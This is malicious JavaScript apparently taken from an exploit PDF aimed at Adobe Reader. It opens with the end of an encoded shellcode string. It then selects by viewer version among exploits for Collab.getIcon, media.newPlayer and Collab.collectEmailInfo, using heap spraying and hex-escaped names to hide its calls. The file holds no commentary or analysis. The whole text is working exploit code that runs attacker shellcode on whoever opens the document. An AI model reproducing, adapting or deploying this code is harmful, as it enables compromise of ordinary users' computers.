f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}